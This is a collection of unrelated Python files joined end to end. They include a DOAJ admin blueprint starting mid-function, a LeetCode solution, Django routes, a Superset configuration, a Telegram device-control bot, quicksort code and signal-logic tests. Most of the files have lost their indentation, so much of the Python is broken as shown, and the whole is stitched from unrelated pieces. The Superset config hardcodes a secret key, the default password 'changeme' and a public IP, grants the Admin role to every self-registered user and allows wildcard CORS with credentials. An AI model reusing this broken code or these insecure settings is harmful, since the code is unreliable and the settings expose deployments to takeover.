additional_info = request.values.get("quick_reject_details", "")
reasons = []
if canned_reason != "":
reasons.append(canned_reason)
if additional_info != "":
reasons.append(additional_info)
if len(reasons) == 0:
abort(400)
reason = " - ".join(reasons)
note = Messages.REJECT_NOTE_WRAPPER.format(editor=current_user.id, note=reason)
applicationService = DOAJ.applicationService()
# retrieve the application and an edit lock on that application
application = None
try:
application, alock = applicationService.application(application_id, lock_application=True, lock_account=current_user._get_current_object())
except lock.Locked as e:
abort(409)
# determine if this was a new application or an update request
update_request = application.current_journal is not None
if update_request:
abort(400)
if application.owner is None:
Messages.flash_with_url(Messages.ADMIN__QUICK_REJECT__NO_OWNER, "error")
# redirect the user back to the edit page
return redirect(url_for('.application', application_id=application_id))
# reject the application
applicationService.reject_application(application, current_user._get_current_object(), note=note)
# send the notification email to the user
sent = False
send_report = []
try:
send_report = emails.send_publisher_reject_email(application, note=reason, update_request=update_request)
sent = True
except app_email.EmailException as e:
pass
# sort out some flash messages for the user
flash(note, "success")
for instructions in send_report:
msg = ""
flash_type = "success"
if sent:
if instructions["type"] == "owner":
msg = Messages.SENT_REJECTED_APPLICATION_EMAIL_TO_OWNER.format(user=application.owner, email=instructions["email"], name=instructions["name"])
elif instructions["type"] == "suggester":
msg = Messages.SENT_REJECTED_APPLICATION_EMAIL_TO_SUGGESTER.format(email=instructions["email"], name=instructions["name"])
else:
msg = Messages.NOT_SENT_REJECTED_APPLICATION_EMAILS.format(user=application.owner)
flash_type = "error"
flash(msg, flash_type)
# redirect the user back to the edit page
return redirect(url_for('.application', application_id=application_id))
@blueprint.route("/admin_site_search", methods=["GET"])
@login_required
@ssl_required
def admin_site_search():
#edit_formcontext = formcontext.ManEdBulkEdit()
#edit_form = edit_formcontext.render_template()
edit_formulaic_context = JournalFormFactory.context("bulk_edit")
edit_form = edit_formulaic_context.render_template()
return render_template("admin/admin_site_search.html",
admin_page=True,
edit_form=edit_form)
@blueprint.route("/editor_groups")
@login_required
@ssl_required
def editor_group_search():
return render_template("admin/editor_group_search.html", admin_page=True)
@blueprint.route("/background_jobs")
@login_required
@ssl_required
def background_jobs_search():
return render_template("admin/background_jobs_search.html", admin_page=True)
@blueprint.route("/editor_group", methods=["GET", "POST"])
@blueprint.route("/editor_group/<group_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def editor_group(group_id=None):
if not current_user.has_role("modify_editor_groups"):
abort(401)
if request.method == "GET":
form = EditorGroupForm()
if group_id is not None:
eg = models.EditorGroup.pull(group_id)
form.group_id.data = eg.id
form.name.data = eg.name
form.editor.data = eg.editor
form.associates.data = ",".join(eg.associates)
return render_template("admin/editor_group.html", admin_page=True, form=form)
elif request.method == "POST":
if request.values.get("delete", "false") == "true":
# we have been asked to delete the id
if group_id is None:
# we can only delete things that exist
abort(400)
eg = models.EditorGroup.pull(group_id)
if eg is None:
abort(404)
eg.delete()
# return a json response
resp = make_response(json.dumps({"success" : True}))
resp.mimetype = "application/json"
return resp
# otherwise, we want to edit the content of the form or the object
form = EditorGroupForm(request.form)
if form.validate():
# get the group id from the url or from the request parameters
if group_id is None:
group_id = request.values.get("group_id")
group_id = group_id if group_id != "" else None
# if we have a group id, this is an edit, so get the existing group
if group_id is not None:
eg = models.EditorGroup.pull(group_id)
if eg is None:
abort(404)
else:
eg = models.EditorGroup()
associates = form.associates.data
if associates is not None:
associates = [a.strip() for a in associates.split(",") if a.strip() != ""]
# prep the user accounts with the correct role(s)
ed = models.Account.pull(form.editor.data)
ed.add_role("editor")
ed.save()
if associates is not None:
for a in associates:
ae = models.Account.pull(a)
if ae is not None: # If the account has been deleted, pull fails
ae.add_role("associate_editor")
ae.save()
eg.set_name(form.name.data)
eg.set_editor(form.editor.data)
if associates is not None:
eg.set_associates(associates)
eg.save()
flash("Group was updated - changes may not be reflected below immediately. Reload the page to see the update.", "success")
return redirect(url_for('admin.editor_group_search'))
else:
return render_template("admin/editor_group.html", admin_page=True, form=form)
@blueprint.route("/autocomplete/user")
@login_required
@ssl_required
def user_autocomplete():
q = request.values.get("q")
s = request.values.get("s", 10)
ac = models.Account.autocomplete("id", q, size=s)
# return a json response
resp = make_response(json.dumps(ac))
resp.mimetype = "application/json"
return resp
# Route which returns the associate editor account names within a given editor group
@blueprint.route("/dropdown/eg_associates")
@login_required
@ssl_required
def eg_associates_dropdown():
egn = request.values.get("egn")
eg = models.EditorGroup.pull_by_key("name", egn)
if eg is not None:
editors = [eg.editor]
editors += eg.associates
editors = list(set(editors))
else:
editors = None
# return a json response
resp = make_response(json.dumps(editors))
resp.mimetype = "application/json"
return resp
####################################################
## endpoints for bulk edit
class BulkAdminEndpointException(Exception):
pass
@app.errorhandler(BulkAdminEndpointException)
def bulk_admin_endpoints_bad_request(exception):
r = {}
    r['error'] = str(exception)
return make_json_resp(r, status_code=400)
def get_bulk_edit_background_task_manager(doaj_type):
if doaj_type == 'journals':
return journal_bulk_edit.journal_manage
elif doaj_type == 'applications':
return suggestion_bulk_edit.suggestion_manage
else:
raise BulkAdminEndpointException('Unsupported DOAJ type - you can currently only bulk edit journals and applications.')
def get_query_from_request(payload):
q = payload['selection_query']
q = remove_search_limits(q)
return q
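# Payload shape shared by the bulk endpoints below (sketch; values are
# illustrative). 'dry_run' defaults to True, so callers must send
# 'dry_run': false to actually enqueue the background job:
#
#   {
#       "selection_query": {"query": {"match_all": {}}},
#       "editor_group": "example-group",   # assign_editor_group only
#       "dry_run": false
#   }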
@blueprint.route("/<doaj_type>/bulk/assign_editor_group", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_assign_editor_group(doaj_type):
task = get_bulk_edit_background_task_manager(doaj_type)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'editor_group'], error_to_raise=BulkAdminEndpointException)
summary = task(
selection_query=get_query_from_request(payload),
editor_group=payload['editor_group'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/<doaj_type>/bulk/add_note", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_add_note(doaj_type):
task = get_bulk_edit_background_task_manager(doaj_type)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'note'], error_to_raise=BulkAdminEndpointException)
summary = task(
selection_query=get_query_from_request(payload),
note=payload['note'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/edit_metadata", methods=["POST"])
@login_required
@ssl_required
@write_required()
def bulk_edit_journal_metadata():
task = get_bulk_edit_background_task_manager("journals")
payload = get_web_json_payload()
if not "metadata" in payload:
raise BulkAdminEndpointException("key 'metadata' not present in request json")
formdata = MultiDict(payload["metadata"])
formulaic_context = JournalFormFactory.context("bulk_edit")
fc = formulaic_context.processor(formdata=formdata)
if not fc.validate():
msg = "Unable to submit your request due to form validation issues: "
for field in fc.form:
if field.errors:
                msg += field.label.text + " - " + ", ".join(field.errors) + "; "
summary = BackgroundSummary(None, error=msg)
else:
summary = task(
selection_query=get_query_from_request(payload),
dry_run=payload.get('dry_run', True),
**payload["metadata"]
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/applications/bulk/change_status", methods=["POST"])
@login_required
@ssl_required
@write_required()
def applications_bulk_change_status():
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query', 'application_status'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = get_bulk_edit_background_task_manager('applications')(
selection_query=q,
application_status=payload['application_status'],
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/journals/bulk/delete", methods=['POST'])
@write_required()
def bulk_journals_delete():
if not current_user.has_role("ultra_bulk_delete"):
abort(403)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = journal_bulk_delete.journal_bulk_delete_manage(
selection_query=q,
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
@blueprint.route("/articles/bulk/delete", methods=['POST'])
@write_required()
def bulk_articles_delete():
if not current_user.has_role("ultra_bulk_delete"):
abort(403)
payload = get_web_json_payload()
validate_json(payload, fields_must_be_present=['selection_query'], error_to_raise=BulkAdminEndpointException)
q = get_query_from_request(payload)
summary = article_bulk_delete.article_bulk_delete_manage(
selection_query=q,
dry_run=payload.get('dry_run', True)
)
return make_json_resp(summary.as_dict(), status_code=200)
################################################# |
'''
https://leetcode.com/contest/weekly-contest-170/problems/get-watched-videos-by-your-friends/
'''
from typing import List
class Solution:
def watchedVideosByFriends(self, watchedVideos: List[List[str]], friends: List[List[int]], id: int, level: int) -> List[str]:
vis = set(friends[id])
q = [*friends[id]]
ps = len(q)
while level > 1:
s = len(q) - ps
ps = 0
for i in range(s, len(q)):
for f in friends[q[i]]:
if f not in vis:
vis.add(f)
q.append(f)
ps += 1
level -= 1
vids = {}
for i in range(len(q) - ps, len(q)):
if q[i] == id: continue
for v in watchedVideos[q[i]]:
if v not in vids: vids[v] = 0
vids[v] += 1
p = [(v, k) for k, v in vids.items()]
p.sort()
return [a[1] for a in p]
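# Approach note: the loop above is a level-by-level BFS; `ps` counts how many
# nodes joined during the most recent level, so only friends at exactly
# `level` hops are tallied. Sorting (count, name) tuples via p.sort() yields
# the required order: ascending frequency, ties broken alphabetically.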
|
from django.conf.urls import url
from . import views
app_name = "users"
urlpatterns = [
# path("", view=views.UserListView.as_view(), name="list"),
# path("~redirect/", view=views.UserRedirectView.as_view(), name="redirect"),
# path("~update/", view=views.UserUpdateView.as_view(), name="update"),
# path(
# "<str:username>",
# view=views.UserDetailView.as_view(),
# name="detail",
# ),
url(
regex=r'^explore$',
view=views.ExploreUsers.as_view(),
name='explore_users'
),
    url(
        regex=r'^(?P<user_id>[0-9]+)/follow/$',
        view=views.FollowUser.as_view(),
        name='follow_user'
    ),
    url(
        regex=r'^(?P<user_id>[0-9]+)/unfollow/$',
        view=views.UnFollowUser.as_view(),
        name='unfollow_user'
    ),
url(
regex=r'^(?P<username>\w+)/followers/$',
view=views.UserFollowers.as_view(),
name='user_followers'
),
url(
regex=r'^(?P<username>\w+)/following/$',
view=views.UserFollowing.as_view(),
name='user_following'
),
url(
regex=r'^search/$',
view=views.Search.as_view(),
name='user_search'
),
url(
regex=r'^(?P<username>\w+)/$',
view=views.UserProfile.as_view(),
name='user_profile'
),
url(
regex=r'^(?P<username>\w+)/password/$',
view=views.ChangePassword.as_view(),
name='change'
),
url(r'^login/facebook/$', views.FacebookLogin.as_view(), name='fb_login'),
# url(
# regex=r'^(?P<username>\w+)/following/$',
# view=views.UserFollowingFBV,
# name='user_following'
# ),
]
|
import sys
if len(sys.argv) != 4:
    print('Usage: ex09-13.py file_name start end')
else:
    nome = sys.argv[1]
    try:
        arquivo = open(nome, 'r')
        inicio = int(sys.argv[2])
        fim = int(sys.argv[3])
    except OSError:
        print(f'{nome} -> file not found.')
    except ValueError:
        print('start and end must be integers.')
    else:
        for linha in arquivo.readlines()[inicio-1: fim]:
            print(linha[:-1])
        arquivo.close() |
import ctypes
so6 = ctypes.CDLL("./so6.so")
l = so6.hello("World!".encode("utf-8"))
print(l)
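# Note: ctypes assumes a C `int` return type by default, so `l` holds whatever
# integer hello() returns. If the function returned e.g. a C string, the
# return type would have to be declared first:
#   so6.hello.restype = ctypes.c_char_p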
|
"""------------------------------------------------------------*-
Model module for Flask server
Tested on: Raspberry Pi 3 B+
(c) Minh-An Dao 2019-2020
(c) Miguel Grinberg 2018
version 1.10 - 21/03/2020
--------------------------------------------------------------
* Defines database columns and tables
*
--------------------------------------------------------------"""
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from hashlib import md5
from app import db, login
from datetime import datetime, timezone
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(64), index=True, unique=True)
password_hash = db.Column(db.String(128))
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
def __repr__(self):
return '<User {} - {}>'.format(self.id, self.username)
@login.user_loader
def load_user(id):
return User.query.get(int(id))
|
import configparser
import os
from os.path import exists, join
import platform
from .docker import RunAsContainer
from .exceptions import MatrixValidationError
from .utilities import Execute
DEFAULT_MATRIX_FILE = 'matrix.ini'
class MatrixEntry(object):
def __init__(self, target, arch, toolchain, variant):
self.target = target
self.arch = arch
self.toolchain = toolchain
self.variant = variant
self.container = None
self.priority = 1
def __repr__(self):
return self.name
@property
def name(self):
return '{}-{}-{}-{}'.format(self.target, self.arch, self.toolchain, self.variant)
def SetupBuildMatrixCommand(commands):
command = commands.add_parser('build-matrix',
        help='Build the project matrix as specified by a matrix configuration.')
command.add_argument('--all', action='store_true', default=False, required=False,
help='Run all entries in the build matrix for the current platform.')
command.add_argument('--concurrency', '-c', type=int, default=1,
required=False,
help='Specify the concurrency for building. Only used when executing '\
'make on a POSIX system.')
command.add_argument('--config', '-C', default=join(os.getcwd(), DEFAULT_MATRIX_FILE),
required=False,
help='Path to the matrix configuration. If one is not specified then '
'the default location is to look in the project root for it.')
command.add_argument('--fresh', action='store_true', default=False,
help='Regenerate the CMake project for the build.')
command.add_argument('--priority', '-p', type=int, default=1, required=False,
help='Specify a build matrix priority to filter on. By default only priority '
'1 items will be built.')
command.add_argument('--verbose', '-v', action='store_true', default=False,
help='Trigger verbose logging during the build process.')
return command
def ParseMatrixConfig(configFile):
config = configparser.ConfigParser()
    with open(configFile, 'r') as handle:
        config.read_file(handle)
target = str(platform.system()).lower()
if not config.has_section(target):
print('No matrix configuration for platform: {}'.format(target))
        return False, []
arch = ValidateTarget(config, target, 'arch')
toolchain = ValidateTarget(config, target, 'toolchain')
variant = ValidateTarget(config, target, 'variant')
matrix = []
for a in arch:
for t in toolchain:
for v in variant:
entry = MatrixEntry(target, a, t, v)
matrix.append([entry.name, entry])
options = [('priority', config.getint), ('container', config.get)]
for section in config.sections():
filters = section.split('-')
if len(filters) != 4:
continue
for _, entry in matrix:
if filters[0] != '*' and entry.target != filters[0]:
continue
if filters[1] != '*' and entry.arch != filters[1]:
continue
if filters[2] != '*' and entry.toolchain != filters[2]:
continue
if filters[3] != '*' and entry.variant != filters[3]:
continue
for option, method in options:
if not config.has_option(section, option):
continue
value = method(section, option)
setattr(entry, option, value)
return True, matrix
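# Sketch of a matrix.ini this parser accepts (all values illustrative).
# Platform sections list whitespace-separated options; extra sections named
# '<target>-<arch>-<toolchain>-<variant>' (with '*' wildcards) override
# 'priority' and 'container' for matching entries:
#
#   [linux]
#   arch = x86_64 arm64
#   toolchain = gcc clang
#   variant = debug release
#
#   [linux-*-clang-release]
#   priority = 2
#   container = build-image:latest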
def RunBuildMatrix(args):
if not exists(args.config):
        print('Matrix configuration does not exist at: {}'.format(args.config))
return False
try:
success, matrix = ParseMatrixConfig(args.config)
except MatrixValidationError as e:
        print(str(e))
return False
if not success:
return False
parameters = dict(concurrency=args.concurrency, fresh=args.fresh,
verbose=args.verbose)
for identifier, entry in matrix:
if not args.all and entry.priority > args.priority:
continue
command = [
'build',
'--arch={}'.format(entry.arch),
'--variant={}'.format(entry.variant.title()),
'--toolchain={}'.format(entry.toolchain),
'--concurrency={}'.format(args.concurrency)
]
print('Building matrix entry: {}'.format(identifier))
if args.verbose:
print('Executing with parameters: {}'.format(' '.join(command)))
if entry.container:
print('Using container: {}'.format(entry.container))
if entry.container:
if not RunAsContainer(parameters, command, entry.container):
print('Matrix build failed for target (container={}): {}'.format(
entry.container, identifier))
return False
else:
command.insert(0, 'fusion-cli')
if not Execute(command, os.getcwd()):
print('Matrix build failed for target: {}'.format(identifier))
return False
return True
def ValidateTarget(config, target, option):
if not config.has_option(target, option):
message = "Matrix configuration for '{}' does not specify: {}".format(
target, option)
raise MatrixValidationError(message)
    values = config.get(target, option, raw=True).strip()
if not values:
print("Option list for '{}' on target '{}' is empty".format(option, target))
return False
return values.split()
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# This file is included in the final Docker image and SHOULD be overridden when
# deploying the image to prod. Settings configured here are intended for use in local
# development environments. Also note that superset_config_docker.py is imported
# as a final step as a means to override "defaults" configured here
#
import logging
import os
import base64
from flask_appbuilder.security.manager import AUTH_OAUTH
from superset_patchup.oauth import CustomSecurityManager
from datetime import timedelta
from typing import Optional
from cachelib.file import FileSystemCache
from celery.schedules import crontab
logger = logging.getLogger()
def get_env_variable(var_name: str, default: Optional[str] = None) -> str:
"""Get the environment variable or raise exception."""
try:
return os.environ[var_name]
except KeyError:
if default is not None:
return default
else:
error_msg = "The environment variable {} was missing, abort...".format(
var_name
)
raise EnvironmentError(error_msg)
DATABASE_DIALECT = get_env_variable("DATABASE_DIALECT")
DATABASE_USER = get_env_variable("DATABASE_USER")
DATABASE_PASSWORD = get_env_variable("DATABASE_PASSWORD")
DATABASE_HOST = get_env_variable("DATABASE_HOST")
DATABASE_PORT = get_env_variable("DATABASE_PORT")
DATABASE_DB = get_env_variable("DATABASE_DB")
# The SQLAlchemy connection string.
SQLALCHEMY_DATABASE_URI = "%s://%s:%s@%s:%s/%s" % (
DATABASE_DIALECT,
DATABASE_USER,
DATABASE_PASSWORD,
DATABASE_HOST,
DATABASE_PORT,
DATABASE_DB,
)
REDIS_HOST = get_env_variable("REDIS_HOST")
REDIS_PORT = get_env_variable("REDIS_PORT")
REDIS_CELERY_DB = get_env_variable("REDIS_CELERY_DB", "0")
REDIS_RESULTS_DB = get_env_variable("REDIS_RESULTS_DB", "1")
RESULTS_BACKEND = FileSystemCache("/app/superset_home/sqllab")
class CeleryConfig(object):
BROKER_URL = f"redis://{REDIS_HOST}:{REDIS_PORT}/{REDIS_CELERY_DB}"
CELERY_IMPORTS = ("superset.sql_lab", "superset.tasks")
CELERY_RESULT_BACKEND = f"redis://{REDIS_HOST}:{REDIS_PORT}/{REDIS_RESULTS_DB}"
CELERYD_LOG_LEVEL = "DEBUG"
CELERYD_PREFETCH_MULTIPLIER = 1
CELERY_ACKS_LATE = False
CELERYBEAT_SCHEDULE = {
"reports.scheduler": {
"task": "reports.scheduler",
"schedule": crontab(minute="*", hour="*"),
},
"reports.prune_log": {
"task": "reports.prune_log",
"schedule": crontab(minute=10, hour=0),
},
}
CELERY_CONFIG = CeleryConfig
FEATURE_FLAGS = {"ALERT_REPORTS": True}
ALERT_REPORTS_NOTIFICATION_DRY_RUN = True
WEBDRIVER_BASEURL = "http://superset:8088/"
# The base URL for the email report hyperlinks.
WEBDRIVER_BASEURL_USER_FRIENDLY = WEBDRIVER_BASEURL
SQLLAB_CTAS_NO_LIMIT = True
#SUPERSET
#
def stringToBase64(s):
return base64.b64encode(s.encode('utf-8')).decode('utf-8')
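# e.g. stringToBase64('user:pass') -> 'dXNlcjpwYXNz', the form expected in an
# HTTP Basic 'Authorization' header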
SECRET_KEY='Yd9OFHQfcu'
OL_SUPERSET_USER='superset'
OL_SUPERSET_PASSWORD='changeme'
OL_BASE_URL='http://35.171.194.94'
AUTHORIZATION_HEADER_TOKEN = stringToBase64(
'%s:%s' % (OL_SUPERSET_USER, OL_SUPERSET_PASSWORD))
AUTH_TYPE = AUTH_OAUTH
OAUTH_PROVIDERS = [
{ 'name':'openlmis',
'token_key':'access_token', # Name of the token in the response of access_token_url
'icon':'fa-sign-in', # Icon for the provider
'remote_app': {
'client_id': OL_SUPERSET_USER, # Client Id (Identify Superset application)
'client_secret': OL_SUPERSET_PASSWORD, # Secret for this Client Id (Identify Superset application)
'client_kwargs':{
'scope': 'read write' # Scope for the Authorization
},
'access_token_method':'POST', # HTTP Method to call access_token_url
'access_token_params':{ # Additional parameters for calls to access_token_url
'scope':'read write'
},
'access_token_headers':{ # Additional headers for calls to access_token_url
'Authorization': 'Basic %s' % AUTHORIZATION_HEADER_TOKEN
},
'api_base_url': '%s/api/oauth' % OL_BASE_URL,
'access_token_url': '%s:80/api/oauth/token?grant_type=authorization_code' % OL_BASE_URL,
'authorize_url': '%s/api/oauth/authorize?' % OL_BASE_URL
}
}
]
# The default user self registration role
# AUTH_USER_REGISTRATION_ROLE = "OLMIS_Gamma"
# Will allow user self registration
# AUTH_USER_REGISTRATION = True
# Map Authlib roles to superset roles
AUTH_ROLE_ADMIN = 'Admin'
AUTH_ROLE_PUBLIC = 'Public'
# Will allow user self registration, allowing to create Flask users from Authorized User
AUTH_USER_REGISTRATION = True
# The default user self registration role
AUTH_USER_REGISTRATION_ROLE = "Admin"
# Extract and use X-Forwarded-For/X-Forwarded-Proto headers?
ENABLE_PROXY_FIX = True
# Allow iFrame access from openLMIS running on localhost
HTTP_HEADERS = {'X-Frame-Options': 'allow-from %s' % OL_BASE_URL}
CUSTOM_SECURITY_MANAGER = CustomSecurityManager
#SESSION_COOKIE_HTTPONLY = False
#SESSION_COOKIE_SAMESITE = 'None' # One of [None, 'Lax', 'Strict']
#SESSION_COOKIE_SECURE = True
ENABLE_CORS = True
CORS_OPTIONS = {
'origins': '*',
'supports_credentials': True
}
WTF_CSRF_ENABLED = True
#WTF_CSRF_CHECK_DEFAULT = False
WTF_CSRF_EXEMPT_LIST = ['custom_security_manager']
WTF_CSRF_TIME_LIMIT = 60 * 60 * 24 * 365
#SESSION_COOKIE_HTTPONLY = False
#SESSION_COOKIE_SECURE = False
#SESSION_COOKIE_SAMESITE = "None"
# Add custom roles
ADD_CUSTOM_ROLES = True
CUSTOM_ROLES = {'OLMIS_Gamma': {'all_datasource_access'}}
#
# Optionally import superset_config_docker.py (which will have been included on
# the PYTHONPATH) in order to allow for local settings to be overridden
#
try:
import superset_config_docker
from superset_config_docker import * # noqa
    logger.info(
        f"Loaded your Docker configuration at [{superset_config_docker.__file__}]"
    )
except ImportError:
logger.info("Using default Docker config...")
|
# PCA for Spotify features data with 2 dimensional output
conf = {
'function':'PCA',
'n_components':2,
'copy':False,
'whiten':False,
'svd_solver':'auto',
'tol':.0,
'iterated_power':'auto',
'random_state':None
}
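# A minimal sketch of how a conf dict like this might drive scikit-learn
# (assumes scikit-learn and numpy are installed; the 'function' key is
# assumed to name the estimator and is stripped before passing kwargs):
import numpy as np
from sklearn.decomposition import PCA
params = {k: v for k, v in conf.items() if k != 'function'}
features = np.random.rand(100, 12)  # stand-in for Spotify feature vectors
reduced = PCA(**params).fit_transform(features)
print(reduced.shape)  # (100, 2)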
|
from telebot import TeleBot
from telebot.types import Message as tele_message
from telebot.types import InlineKeyboardMarkup, InlineKeyboardButton
from DeviceControllerTelegramBot.device_controller import DeviceController
class ControllerBot:
    def __init__(self, API_KEY: str, devices: dict, serial_comms_conf: dict, admin_chat_ids: list[int] = None) -> None:
        self.bot = TeleBot(token=API_KEY)
        # avoid a mutable default argument; fall back to a single-None sentinel
        self.CHAT_IDs = admin_chat_ids if admin_chat_ids is not None else [None]
        self.board = DeviceController(devices, serial_comms_conf)
        @self.bot.message_handler(commands=['start'])
        def _start_message(message: tele_message):
            # validation alerts the admins about unknown users as a side effect
            self.__validate_request(message)
            user_details = self.__get_user_details(message)
            self.bot.reply_to(message=message, text=user_details)
@self.bot.message_handler(commands=['help'])
        def _help_message(message: tele_message):
if self.__validate_request(message):
self.bot.reply_to(message=message, text='\r\nDevice Controller Telegram Bot\r\nWritten by Dhrumil Mistry\r\nGithub Profile : \r\nhttps://github.com/dmdhrumilmistry\r\n---------------------------------------\r\ncommand : description\r\n---------------------------------------\r\n/start : get chat id and user details\r\n/help : get help menu\r\n/devices : get devices control options\r\n')
@self.bot.message_handler(commands=['devices'])
def _handle_devices(message: tele_message):
if self.__validate_request(message):
# provide control option to user using inline buttons
for device in self.board.device_pins:
keyboard = InlineKeyboardMarkup()
keyboard.row(
InlineKeyboardButton(
text="ON", callback_data=f"{device}-1"),
InlineKeyboardButton(
text="OFF", callback_data=f"{device}-0"),
)
self.bot.reply_to(
message, f'Choose {device} State:', reply_markup=keyboard)
@self.bot.callback_query_handler(func=lambda call: True)
def _callback_handler(query):
self.bot.send_chat_action(query.message.chat.id, 'typing')
message = query.message
chat_id = message.chat.id
# validate request
if self.__validate_request(message):
command: str = query.data
                device = command.split('-')[0]  # callback data is '<device>-<state>'
self.__set_states(command)
self.bot.delete_message(chat_id, query.message.message_id)
self.bot.send_message(
chat_id, f'{device} State Transition Completed.')
# if no command is valid, return invalid message
@self.bot.message_handler(func=lambda message: True)
def _echo_invalid(message):
self.bot.reply_to(message, "INVALID OPTION")
@staticmethod
def __get_user_details(message: tele_message):
'''
returns messenger's details
'''
return f'Chat ID : {message.chat.id}\nName : {message.from_user.full_name}\nUserName : {message.from_user.username}\nIs BOT : {message.from_user.is_bot}'
def __set_states(self, command):
command = command.split('-')
device_name = command[0]
device_state = command[1]
# update device state
self.board.device_pins[device_name].state = device_state
board_command = f'{self.board.device_pins[device_name]},'
self.board.update_values(board_command)
def __validate_request(self, message: tele_message) -> bool:
'''
        returns True if the request is from an admin, else False
'''
if int(message.chat.id) not in self.CHAT_IDs:
# \nDetailed Information :{message}
alert_message = f'[!] Intruder Alert!!\n{self.__get_user_details(message)}\nTried Command : {message.text}\n'
for chat_id in self.CHAT_IDs:
if chat_id:
self.bot.send_message(chat_id=chat_id, text=alert_message)
self.bot.send_message(
chat_id=message.from_user.id, text='Not Authorized !!')
return False
return True
def start(self):
'''
start Device Controller Bot
'''
print("[+] Starting Bot...")
self.bot.infinity_polling()
print('[!] Bot Stopped!')
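# A hypothetical usage sketch; the shapes of `devices` and `serial_comms_conf`
# are assumptions inferred from how DeviceController is constructed above, and
# the token and chat id are placeholders.
if __name__ == '__main__':
    controller = ControllerBot(
        API_KEY='YOUR-TELEGRAM-BOT-TOKEN',
        devices={'fan': 2, 'light': 3},
        serial_comms_conf={'port': '/dev/ttyUSB0', 'baudrate': 9600},
        admin_chat_ids=[123456789],
    )
    controller.start()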
|
from pathlib import Path
# This may be interesting; but it is always better to
# provide an unambiguous argument instead of inspect!
class A:
    def __init__(self):
        import inspect
        # stack()[1] is the caller's frame record; its filename locates the caller
        f = inspect.stack()[1]
        # print(f.filename)
        self.p = Path(f.filename).parent.resolve()
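# The unambiguous alternative the comment above recommends: have the caller
# pass its own __file__ instead of relying on stack inspection.
class B:
    def __init__(self, caller_file: str):
        self.p = Path(caller_file).parent.resolve()
# b = B(__file__)  # the caller states its location explicitly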
|
#
# most basic quick_sort.
# This example does not optimize memory. Lots of copies.
#
import random

def quick_sort(data):
    if not data: return data
    pivot = random.choice(data)
    front = quick_sort([item for item in data if item < pivot])
    back = quick_sort([item for item in data if item > pivot])
    match = [item for item in data if item == pivot]
    return front + match + back
# ----------------------------------------------------------------------------
def quicksort(array):
qsort(array, 0, len(array)-1)
def qsort(A, lo, hi):
if lo < hi:
p = partition(A, lo, hi)
qsort(A, lo, p)
qsort(A, p + 1, hi)
def partition(A, lo, hi):
    # Hoare partition: pivot is the first element of the range
    pivot = A[lo]
    i, j = lo - 1, hi + 1
    while True:
        i += 1
        j -= 1
        while A[i] < pivot: i += 1
        while A[j] > pivot: j -= 1
        if i >= j:
            return j
        A[i], A[j] = A[j], A[i]
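# ----------------------------------------------------------------------------
# quick sanity check for both implementations
if __name__ == '__main__':
    data = [5, 3, 8, 1, 9, 2, 8]
    assert quick_sort(data) == sorted(data)  # returns a new sorted list
    quicksort(data)  # sorts in place
    assert data == sorted(data)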
|
""" Test cases for the untimed until operation.
This only exists in the efficient algorithm implementation. """
import unittest
from stl.signals import Signal
from stl.operators import computeUntimedUntil
class UntimedUntilTest(unittest.TestCase):
""" Implementation of the Untimed Until tests. """
def setUp(self) -> None:
return super().setUp()
def testEmptySignal(self):
empty = Signal()
nonEmpty = Signal('t', [0, 1], [0, 1], [1, 0])
expectedResult = Signal("untimedUntil")
self.assertEqual(computeUntimedUntil(empty, empty), expectedResult)
self.assertEqual(computeUntimedUntil(empty, nonEmpty), expectedResult)
self.assertEqual(computeUntimedUntil(nonEmpty, empty), expectedResult)
def testSimpleSignal(self) -> None:
inputSignal: Signal = Signal('test', [0, 1], [0, 1], [1, 0])
expectedResult = Signal("untimedUntil", [0, 1], [0, 1], [1, 0])
self.assertEqual(computeUntimedUntil(inputSignal, inputSignal), expectedResult)
inputSignal: Signal = Signal('test', [0, 1], [-1, 1], [2, 0])
expectedResult = Signal("untimedUntil", [0, 1], [-1, 1], [2, 0])
self.assertEqual(computeUntimedUntil(inputSignal, inputSignal), expectedResult)
def testSmallSignal(self) -> None:
lhs = Signal("left", [0, 1, 2, 3, 4], [2, 7, 5, 4, -1], [5, -2, -1, -5, 0])
rhs = Signal("right", [0, 1, 2, 3, 4], [-1, -1, -1, 1, 1], [0, 0, 2, 0, 0])
expectedResult = Signal("untimedUntil", [0, 1, 2, 3, 3.6, 4], [1, 1, 1, 1, 1, 1], [0, 0, 0, 0, 0, 0])
self.assertEqual(computeUntimedUntil(lhs, rhs), expectedResult)
rhs = Signal("right", [0, 1, 2, 3, 4], [-1, -1, -1, 4, 1], [0, 0, 2, 0, 0])
expectedResult = Signal("untimedUntil", [0, 1, 2, 3, 4], [2, 4, 4, 4, 1], [2, 0, 0, -3, 0])
self.assertEqual(computeUntimedUntil(lhs, rhs), expectedResult)
lhs = Signal("left", [0, 1, 2, 3, 4], [-2, -7, -5, -4, -1], [5, -2, -1, -5, 0])
